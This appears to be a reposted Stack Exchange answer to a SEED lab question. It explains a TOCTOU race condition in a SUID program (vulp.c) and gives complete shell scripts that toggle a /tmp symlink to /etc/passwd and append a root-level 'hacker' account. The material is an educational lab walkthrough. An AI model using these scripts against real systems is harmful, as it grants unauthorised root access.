Ubuntu SEED环境下利用并发漏洞突破锁定文件权限的技术问询
Alright, let's break down why you're hitting "permission denied" and fix your exploit step by step. You're targeting a classic Time-of-Check to Time-of-Use (TOCTOU) vulnerability in vulp.c, but your current scripts are misusing the race condition, and you've got the exploit logic backwards.
1. Why You're Seeing "Permission Denied"
Let's look at the critical flow in vulp.c that's tripping you up:
if(!access(fn, W_OK)){ // This checks write permission AS THE SEED USER fp = fopen(fn, "a+"); // But this opens the file AS ROOT (thanks to SUID) // ... write user input to the file }
Your attack.sh switches /tmp/XYZ to point to either /home/seed/vulp or /etc/passwd—neither of which the seed user has write permission for. So every time access(fn, W_OK) runs, it fails, and you get the "No permission" message.
The exploit relies on tricking the program into passing the access check (using a file seed can write to) then swapping the link to your target file (like /etc/passwd) before fopen executes.
2. Fix the Core Exploit Logic
Here's the correct approach:
- Create a temporary file that
seedowns and can write to (soaccesspasses). - Continuously toggle
/tmp/XYZbetween this temp file and/etc/passwd(this creates the race window). - Run
vulprepeatedly with crafted input until the race wins, and your input gets written to/etc/passwdwith root permissions.
3. Corrected Scripts & Setup
First, Prepare the Crafted Input
Create a passwd_input file with a new root-level user. First generate a password hash using openssl passwd -1 (example uses password "hacker123"):
# Generate the hash (run this first, copy the output) openssl passwd -1 # Now create the input file (replace the hash below with your generated one) echo "hacker:\$1\$abc\$abcdefghijklmnopqrstuvwx:0:0:Hacker User:/root:/bin/bash" > passwd_input
(Make sure to escape the $ signs so the shell doesn't expand them prematurely.)
Corrected attack.sh
This script runs forever, swapping /tmp/XYZ between a writable temp file and /etc/passwd to create the race condition:
#!/bin/sh # Create a temp file we definitely have write access to TMP_FILE="/tmp/seed_writable_temp" touch $TMP_FILE # Loop forever toggling the symlink while true; do ln -sf $TMP_FILE /tmp/XYZ ln -sf /etc/passwd /tmp/XYZ done
Corrected check.sh
This script runs vulp repeatedly and stops when our crafted user appears in /etc/passwd:
#!/bin/sh COUNTER=0 while true; do ./vulp < passwd_input COUNTER=$((COUNTER + 1)) # Check if our hacker user has been added to /etc/passwd if grep -q "hacker:" /etc/passwd; then break fi done echo "Success! Exploit worked after $COUNTER attempts." echo "You can now switch to the hacker user with: su hacker"
4. Run the Exploit
- Make sure your scripts are executable:
chmod +x attack.sh check.sh
- Run both scripts in parallel (use
parallelor two separate terminals for better visibility):
parallel -j 2 -- './attack.sh' './check.sh'
Or open two terminals:
- Terminal 1:
./attack.sh - Terminal 2:
./check.sh
5. Key Notes
- Race Luck: This is a race condition, so it might take a few hundred or thousand attempts to win—be patient.
- /tmp Permissions: Ensure
/tmphas default permissions (1777, world-writable with sticky bit) so symlinks work as expected. - Cleanup: After testing, don't forget to remove the hacker user from
/etc/passwdand delete/tmp/XYZand the temp file.
内容的提问来源于stack exchange,提问作者Diana G

